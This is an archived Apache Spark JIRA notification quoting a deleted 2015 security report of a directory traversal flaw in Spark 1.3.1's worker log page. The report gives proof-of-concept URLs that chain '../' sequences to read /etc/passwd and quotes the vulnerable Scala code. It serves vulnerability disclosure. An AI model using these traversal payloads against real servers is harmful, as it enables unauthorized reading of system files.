You are viewing a plain text version of this content. The canonical link for it is here.
Posted to issues@spark.apache.org by "Patrick Wendell (JIRA)" <ji...@apache.org> on 2015/06/03 19:29:38 UTC

[jira] [Deleted] (SPARK-8073) Directory traversal vulnerability

     [ https://issues.apache.org/jira/browse/SPARK-8073?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Patrick Wendell deleted SPARK-8073:
-----------------------------------


> Directory traversal vulnerability
> ---------------------------------
>
>                 Key: SPARK-8073
>                 URL: https://issues.apache.org/jira/browse/SPARK-8073
>             Project: Spark
>          Issue Type: Bug
>         Environment: Centos6.4
>            Reporter: 0keeTeam
>            Priority: Critical
>
> We are a information security team from QIHU 360  company, China. 
> We found a 0day vulnerability in spark and writing to apply for a CVE ID,Please refer to below report.  Thanks!
> [Team info]
>          name: 0keeTeam
>          company: QIHU 360 company, China
>          email: g-sec-web@360.cn
> Details of the vulnerability are as follows:
> {color:red}
> Poc&Exp:
> http://xxx.com/logPage/?appId=../../../../../../../../../../../../../../../&executorId=&logType=etc/passwd
> or:
> http://xxx.com/logPage/?driverId=../../../../../../../../../../../../../../../&logType=etc/passwd
> {color}
> *spark-1.3.1\core\src\main\scala\org\apache\spark\deploy\worker\ui\LogPage.scala : Line36:*
> {quote}{color:red}// parameters get from GET are not filtered{color}
>     val appId = Option(request.getParameter("appId"))
>     val executorId = Option(request.getParameter("executorId"))
>     val driverId = Option(request.getParameter("driverId"))
>     val logType = request.getParameter("logType")
>     val offset = Option(request.getParameter("offset")).map(_.toLong)
>     val byteLength = Option(request.getParameter("byteLength")).map(_.toInt).getOrElse(defaultBytes)
>      ........
> val (logText, startByte, endByte, logLength) = getLog(logDir, logType, offset, byteLength)
> {quote}
> *and Line125:*
> {quote}
>   private def getLog(
>      ........
>       val files = RollingFileAppender.getSortedRolledOverFiles(logDirectory, logType)
>      ........
>       val logText = Utils.offsetBytes(files, startIndex, endIndex)
>    {quote}
> *spark-1.3.1\core\src\main\scala\org\apache\spark\util\logging\RollingFileAppender.scala :Line152:*
> {quote}
>   def getSortedRolledOverFiles(directory: String, activeFileName: String): 
>      ........
>       val file = new File(directory, activeFileName).getAbsoluteFile
>      ........
> {quote}



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

---------------------------------------------------------------------
To unsubscribe, e-mail: issues-unsubscribe@spark.apache.org
For additional commands, e-mail: issues-help@spark.apache.org